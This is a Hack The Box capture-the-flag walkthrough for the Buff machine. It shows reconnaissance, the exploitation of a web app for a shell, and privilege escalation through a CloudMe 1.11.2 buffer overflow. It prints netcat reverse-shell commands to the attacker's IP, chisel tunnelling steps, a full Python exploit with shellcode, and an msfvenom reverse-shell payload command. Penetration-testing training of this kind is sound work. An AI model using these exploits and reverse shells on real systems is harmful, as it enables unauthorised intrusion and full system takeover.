Buff HTB
IP
10.10.10.198initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.198 | cut -d"/" -f1 | tr '\n' ','we have the following ports open on the target
8080
Lets try and get more information of the target
sudo nmap -sCV -p8080 10.10.10.198 -oA nmap_resultsresults
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 06:16 EST
Nmap scan report for 10.10.10.198
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds
Heading over to port 8080 we can see the following
lets get feroxbuster runnnig and see if we can find any hidden web pages
feroxbuster -u http://10.10.10.198:8080 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js -o dirs.txthunting around the website, within the contact.php we do find the application running the web app
we can try to find any vulnerabilities associated with this software, after abit of googling we find
we can utilise the following exploit to gain a shell on the target
python2 exploit.py http://10.10.10.198:8080/ we now have a shell on the target machine
we do have limited functionality within this shell Lerts upload nc.exe and upgrade our shell
Lets start a smb server on our local machine
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2supportLets copy nc.exe over to the target (from our shell)
copy \\10.10.14.3\shrek123\nc.exeNow lets start a listner
rlwrap -cAr nc -lvnp 9001Now lets execute nc.exe and gain our shell
.\nc.exe -e cmd.exe 10.10.14.3 9001we have our shell
when we check netstat we can see two ports listening only within the local host
netstat -ano3306
MySQL8888
XAmpp stack
Next lets grab the process ID of port 8888 (6044) and grep (findstr)
the PID does change every couple of seconds so to find it
netstat -ano | findstr 8888
tasklist /v | findstr 6044 # most recent PID
We can see there is a .exe file being executed, Lets see if we can find it
Looking through the user shaun directory we do find it within the downloads directory
What we can do next is see if we can find any vulnerabilities associated with this program
searchsploit CloudMe
we can see the version number of
CloudMebeing 1.11.2
Now to exploit this service, we will need to tunnel from our local machine to the target machine , we can use the tool chisel for this
more specifically the .exe executable
We can transfer via our smb server
we will copy the Windows binary to the
/programdatadirectory (where we will be staging in )
copy \\10.10.14.3\shrek123\chisel_1.9.1_windows_amd64 c.exeNow we will run the Linux binary on our local machine in server mode
chmod +x chisel_1.9.1_linux_amd64
sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverseNext from our target machine, we will run chisel as the client
.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888Now if we run
netstaton our local machine we should we are listening on port 8888
netstat -ano | grep 8888
Now that we have chisel set up Lets look at this exploit
searchsploit -m windows/remote/48389.pyThe exploit
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)we can see the following
it opens a connection to the target on port 8888
it sends a buffer
pretty simple right
we can utilize msfvenom to generate our own payload that will return a stageless (can catch with nc) reverse tcp shell
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9010 -b '\x00\x0A\x0D' -f python -v payloadNow we can change the payload within the existing exploit with our newly created payload we created with msfvenom
Now we can start our nc listener
nc -lvnp 9010and we can run the exploit
python 48389.py
we now have a shell as administrator on the target machine
Last updated